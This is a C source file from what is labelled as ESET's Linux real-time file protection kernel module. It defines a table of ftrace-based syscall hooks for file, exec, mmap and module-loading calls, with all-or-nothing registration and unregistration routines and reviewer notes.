/*
 * eset_rtp (ESET Real-time file system protection module)
 * Copyright (C) 1992-2025 ESET, spol. s r.o.
 *
 * This program is free software: you can redistribute it and/or modify
 * it under the terms of the GNU General Public License as published by
 * the Free Software Foundation, either version 3 of the License, or
 * (at your option) any later version.
 *
 * This program is distributed in the hope that it will be useful,
 * but WITHOUT ANY WARRANTY; without even the implied warranty of
 * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
 * GNU General Public License for more details.
 *
 * You should have received a copy of the GNU General Public License
 * along with this program.  If not, see <https://www.gnu.org/licenses/>.
 *
 * In case of any questions, you can contact us at ESET, spol. s r.o., Einsteinova 24, 851 01 Bratislava, Slovakia.
 */


#undef CONFIG_FTRACE_SYSCALLS

#include "ertp_handlers.h"

#include "ertp_ftrace_hook.h"
#include "ertp_handlers_close.h"
#include "ertp_handlers_execve.h"
#include "ertp_handlers_exit.h"
#include "ertp_handlers_mmap.h"
#include "ertp_handlers_module.h"
#include "ertp_handlers_open.h"
#include "ertp_handlers_rename.h"
#include "ertp_handlers_unlink.h"
#include "ertp_logs.h"

/*
 * Prefix prepended to the syscall name for the 64-bit entries of the hook
 * table. Linux x86-64 syscall wrapper symbols are named __x64_sys_<name>;
 * NOTE(review): this hard-codes the x86-64 naming - confirm no other
 * architecture is built from this file.
 */
#define ERTP_SYSCALL64_PREFIX "__x64_sys_"

/*
 * Expands to a designated initializer for one hook-table entry.
 *
 *   sym       - value stored in .name (the strings used in this file are
 *               syscall names, with or without ERTP_SYSCALL64_PREFIX)
 *   kind      - value stored in .syscall_type (an ERTP_SYSCALL_TYPE_* constant)
 *   hook_fn   - value stored in .handler
 *   orig_slot - value stored in .original (call sites pass the address of an
 *               ertp_original_* variable)
 *
 * Every argument is parenthesized so that an expression argument cannot
 * change the meaning of the initializer.
 */
#define ERTP_HOOK(sym, kind, hook_fn, orig_slot) \
  {                                              \
    .name = (sym),                               \
    .syscall_type = (kind),                      \
    .handler = (hook_fn),                        \
    .original = (orig_slot)                      \
  }

/*
 * Table of every syscall hook installed by this file.
 *
 * Each entry pairs a syscall name and an ERTP_SYSCALL_TYPE_* constant with the
 * handler to install and the address of the variable that holds the original
 * entry point. ertp_handlers_init() registers the entries in table order and
 * ertp_handlers_deinit() unregisters all of them.
 *
 * This table is the list of syscalls this file intercepts: a syscall with no
 * entry here gets no handler from this file. When adding a syscall, add an
 * entry for every syscall type that can reach it.
 *
 * The 64-bit entries carry the full symbol name (ERTP_SYSCALL64_PREFIX + name);
 * the 32-bit entries carry only the bare syscall name.
 * NOTE(review): presumably ertp_ftrace_hook_register() derives the 32-bit
 * symbol name from .syscall_type - confirm in ertp_ftrace_hook.c.
 */
static struct ertp_ftrace_hook ertp_ftrace_hooks[] = {
    /* 64-bit syscalls: file open/close and descriptor duplication */
    ERTP_HOOK(ERTP_SYSCALL64_PREFIX "open", ERTP_SYSCALL_TYPE_NATIVE_64,
              ertp_handler_native_64_open, &ertp_original_native_64_open),
    ERTP_HOOK(ERTP_SYSCALL64_PREFIX "openat", ERTP_SYSCALL_TYPE_NATIVE_64,
              ertp_handler_native_64_openat, &ertp_original_native_64_openat),
    ERTP_HOOK(ERTP_SYSCALL64_PREFIX "close", ERTP_SYSCALL_TYPE_NATIVE_64,
              ertp_handler_native_64_close, &ertp_original_native_64_close),
    ERTP_HOOK(ERTP_SYSCALL64_PREFIX "dup2", ERTP_SYSCALL_TYPE_NATIVE_64,
              ertp_handler_native_64_dup2, &ertp_original_native_64_dup2),
    ERTP_HOOK(ERTP_SYSCALL64_PREFIX "dup3", ERTP_SYSCALL_TYPE_NATIVE_64,
              ertp_handler_native_64_dup3, &ertp_original_native_64_dup3),
    /* 64-bit syscalls: process exit and program execution */
    ERTP_HOOK(ERTP_SYSCALL64_PREFIX "exit", ERTP_SYSCALL_TYPE_NATIVE_64,
              ertp_handler_native_64_exit, &ertp_original_native_64_exit),
    ERTP_HOOK(ERTP_SYSCALL64_PREFIX "exit_group", ERTP_SYSCALL_TYPE_NATIVE_64,
              ertp_handler_native_64_exit_group,
              &ertp_original_native_64_exit_group),
    ERTP_HOOK(ERTP_SYSCALL64_PREFIX "execve", ERTP_SYSCALL_TYPE_NATIVE_64,
              ertp_handler_native_64_execve, &ertp_original_native_64_execve),
    ERTP_HOOK(ERTP_SYSCALL64_PREFIX "execveat", ERTP_SYSCALL_TYPE_NATIVE_64,
              ertp_handler_native_64_execveat,
              &ertp_original_native_64_execveat),
    /* 64-bit syscalls: kernel module loading */
    ERTP_HOOK(ERTP_SYSCALL64_PREFIX "finit_module", ERTP_SYSCALL_TYPE_NATIVE_64,
              ertp_handler_native_64_finit_module,
              &ertp_original_native_64_finit_module),
    ERTP_HOOK(ERTP_SYSCALL64_PREFIX "init_module", ERTP_SYSCALL_TYPE_NATIVE_64,
              ertp_handler_native_64_init_module,
              &ertp_original_native_64_init_module),
    /* 64-bit syscalls: memory mapping, rename and unlink */
    ERTP_HOOK(ERTP_SYSCALL64_PREFIX "mmap", ERTP_SYSCALL_TYPE_NATIVE_64,
              ertp_handler_native_64_mmap, &ertp_original_native_64_mmap),
    ERTP_HOOK(ERTP_SYSCALL64_PREFIX "rename", ERTP_SYSCALL_TYPE_NATIVE_64,
              ertp_handler_native_64_rename, &ertp_original_native_64_rename),
    ERTP_HOOK(ERTP_SYSCALL64_PREFIX "renameat", ERTP_SYSCALL_TYPE_NATIVE_64,
              ertp_handler_native_64_renameat,
              &ertp_original_native_64_renameat),
    ERTP_HOOK(ERTP_SYSCALL64_PREFIX "renameat2", ERTP_SYSCALL_TYPE_NATIVE_64,
              ertp_handler_native_64_renameat2,
              &ertp_original_native_64_renameat2),
    ERTP_HOOK(ERTP_SYSCALL64_PREFIX "unlink", ERTP_SYSCALL_TYPE_NATIVE_64,
              ertp_handler_native_64_unlink, &ertp_original_native_64_unlink),
    ERTP_HOOK(ERTP_SYSCALL64_PREFIX "unlinkat", ERTP_SYSCALL_TYPE_NATIVE_64,
              ertp_handler_native_64_unlinkat,
              &ertp_original_native_64_unlinkat),

/*
 * The entries below exist only when the kernel is built with CONFIG_COMPAT.
 * Two syscall types are used: ERTP_SYSCALL_TYPE_COMPAT_32 for open, openat,
 * execve and execveat, and ERTP_SYSCALL_TYPE_NATIVE_32 for the rest.
 * NOTE(review): this section is not an entry-for-entry mirror of the 64-bit
 * section above; confirm that each difference is intentional when editing.
 */
#ifdef CONFIG_COMPAT

    ERTP_HOOK("open", ERTP_SYSCALL_TYPE_COMPAT_32, ertp_handler_compat_32_open,
              &ertp_original_compat_32_open),
    ERTP_HOOK("openat", ERTP_SYSCALL_TYPE_COMPAT_32,
              ertp_handler_compat_32_openat, &ertp_original_compat_32_openat),

    ERTP_HOOK("execve", ERTP_SYSCALL_TYPE_COMPAT_32,
              ertp_handler_compat_32_execve, &ertp_original_compat_32_execve),
    ERTP_HOOK("execveat", ERTP_SYSCALL_TYPE_COMPAT_32,
              ertp_handler_compat_32_execveat,
              &ertp_original_compat_32_execveat),
    /* open/openat/execve/execveat are listed again with the NATIVE_32 type */
    ERTP_HOOK("open", ERTP_SYSCALL_TYPE_NATIVE_32, ertp_handler_native_32_open,
              &ertp_original_native_32_open),
    ERTP_HOOK("openat", ERTP_SYSCALL_TYPE_NATIVE_32,
              ertp_handler_native_32_openat, &ertp_original_native_32_openat),
    ERTP_HOOK("close", ERTP_SYSCALL_TYPE_NATIVE_32,
              ertp_handler_native_32_close, &ertp_original_native_32_close),
    ERTP_HOOK("dup2", ERTP_SYSCALL_TYPE_NATIVE_32, ertp_handler_native_32_dup2,
              &ertp_original_native_32_dup2),
    ERTP_HOOK("dup3", ERTP_SYSCALL_TYPE_NATIVE_32, ertp_handler_native_32_dup3,
              &ertp_original_native_32_dup3),
    ERTP_HOOK("exit", ERTP_SYSCALL_TYPE_NATIVE_32, ertp_handler_native_32_exit,
              &ertp_original_native_32_exit),
    ERTP_HOOK("exit_group", ERTP_SYSCALL_TYPE_NATIVE_32,
              ertp_handler_native_32_exit_group,
              &ertp_original_native_32_exit_group),
    ERTP_HOOK("execve", ERTP_SYSCALL_TYPE_NATIVE_32,
              ertp_handler_native_32_execve, &ertp_original_native_32_execve),
    ERTP_HOOK("execveat", ERTP_SYSCALL_TYPE_NATIVE_32,
              ertp_handler_native_32_execveat,
              &ertp_original_native_32_execveat),
    ERTP_HOOK("finit_module", ERTP_SYSCALL_TYPE_NATIVE_32,
              ertp_handler_native_32_finit_module,
              &ertp_original_native_32_finit_module),
    ERTP_HOOK("init_module", ERTP_SYSCALL_TYPE_NATIVE_32,
              ertp_handler_native_32_init_module,
              &ertp_original_native_32_init_module),

    ERTP_HOOK("rename", ERTP_SYSCALL_TYPE_NATIVE_32,
              ertp_handler_native_32_rename, &ertp_original_native_32_rename),
    ERTP_HOOK("renameat", ERTP_SYSCALL_TYPE_NATIVE_32,
              ertp_handler_native_32_renameat,
              &ertp_original_native_32_renameat),
    ERTP_HOOK("renameat2", ERTP_SYSCALL_TYPE_NATIVE_32,
              ertp_handler_native_32_renameat2,
              &ertp_original_native_32_renameat2),
    ERTP_HOOK("unlink", ERTP_SYSCALL_TYPE_NATIVE_32,
              ertp_handler_native_32_unlink, &ertp_original_native_32_unlink),
    ERTP_HOOK("unlinkat", ERTP_SYSCALL_TYPE_NATIVE_32,
              ertp_handler_native_32_unlinkat,
              &ertp_original_native_32_unlinkat),
#endif
};

/**
 * ertp_handlers_init() - register every hook listed in ertp_ftrace_hooks.
 *
 * Hooks are registered one by one in table order. Registration is
 * all-or-nothing: when one hook fails to register, the hooks registered before
 * it are unregistered again (also in table order) and the failure is returned,
 * so the function never leaves a partial set of handlers installed.
 *
 * NOTE(review): the failure path does not log which hook failed; presumably
 * ertp_ftrace_hook_register() or the caller reports it - confirm, since a
 * silent failure here means no syscall handler is active.
 *
 * Return: 0 when all hooks are registered, otherwise the non-zero value
 * returned by ertp_ftrace_hook_register() for the hook that failed.
 */
int ertp_handlers_init(void) {
  size_t next;
  size_t undo;
  int err = 0;

  for (next = 0; next < ARRAY_SIZE(ertp_ftrace_hooks); next++) {
    err = ertp_ftrace_hook_register(&ertp_ftrace_hooks[next]);
    if (err) {
      break;
    }
  }

  if (!err) {
    ertp_pr_info("registered syscall handlers");
    return 0;
  }

  /* 'next' is the index of the hook that failed; undo everything before it. */
  for (undo = 0; undo < next; undo++) {
    ertp_ftrace_hook_unregister(&ertp_ftrace_hooks[undo]);
  }

  return err;
}

/**
 * ertp_handlers_deinit() - unregister every hook listed in ertp_ftrace_hooks.
 *
 * Walks the whole table in order and unregisters each entry, then logs that
 * the handlers are gone. Any result of ertp_ftrace_hook_unregister() is not
 * examined here.
 *
 * NOTE(review): every entry is unregistered unconditionally; this assumes the
 * function is only called after ertp_handlers_init() succeeded, or that
 * unregistering a hook that was never registered is harmless - confirm.
 */
void ertp_handlers_deinit(void) {
  const size_t total = ARRAY_SIZE(ertp_ftrace_hooks);
  size_t idx = 0;

  while (idx < total) {
    ertp_ftrace_hook_unregister(&ertp_ftrace_hooks[idx]);
    idx++;
  }

  ertp_pr_info("unregistered syscall handlers");
}
